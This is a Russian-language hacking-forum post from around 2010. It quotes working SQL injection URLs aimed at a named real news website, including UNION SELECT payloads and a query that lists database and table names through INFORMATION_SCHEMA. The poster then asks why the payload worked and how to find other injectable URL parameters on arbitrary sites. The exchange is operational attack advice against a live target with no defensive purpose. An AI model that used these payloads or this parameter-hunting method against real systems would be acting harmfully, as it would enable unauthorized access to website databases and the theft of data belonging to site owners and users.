|
Познающий
Регистрация: 10.08.2009
Сообщений: 30
С нами:
8816961
Репутация:
4
|
|
Сообщение от S00pY
туц
Код:
asianewsnet.net/news.php?id=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*-+&sec=2
Возможно скрипт работает с другой БД.Укажите в запросе имя БД
Код:
-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+database.tablename+--+
Имя базы данных:
Код:
-11+union+select+1,2,3,concat_ws(0x3a,table_name,table_schema),5,6,7,8,9,10,11,12+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+29,1+--+
Зы:Может не хватать прав на доступ
спасибо) А можно немного по подробней, из=за чего не отображалось с "-" а с "999999999999" заработало? и что означает "-+&sec=2"?
____________________________________
И еще я сюда напишу сразу, может кто подскажет, я тут перечитываю заново некоторые статьи, например вот в этой https://forum.antichat.ru/thread19844.html написано,
По моим последним наблюдениям до 80% веб ресурсов сети подвержены подобным атакам
как искать подобного рода уязвимости? почти все статьи что я читаю указывают параметр "?id=" и дальше пробовать подставлять разные значения, но тоесть получается не обязательно нужен "?id=" ? но и любой параметр подойдет, например встречал "?int=" "?e=" "?i=" , с ними также пробовать подставлять, или вообще на сайте (в урле) искать любое числовое значение и пробовать менять и подставлять к нему данные?
Последний раз редактировалось Gidz; 11.01.2010 в 11:21..
|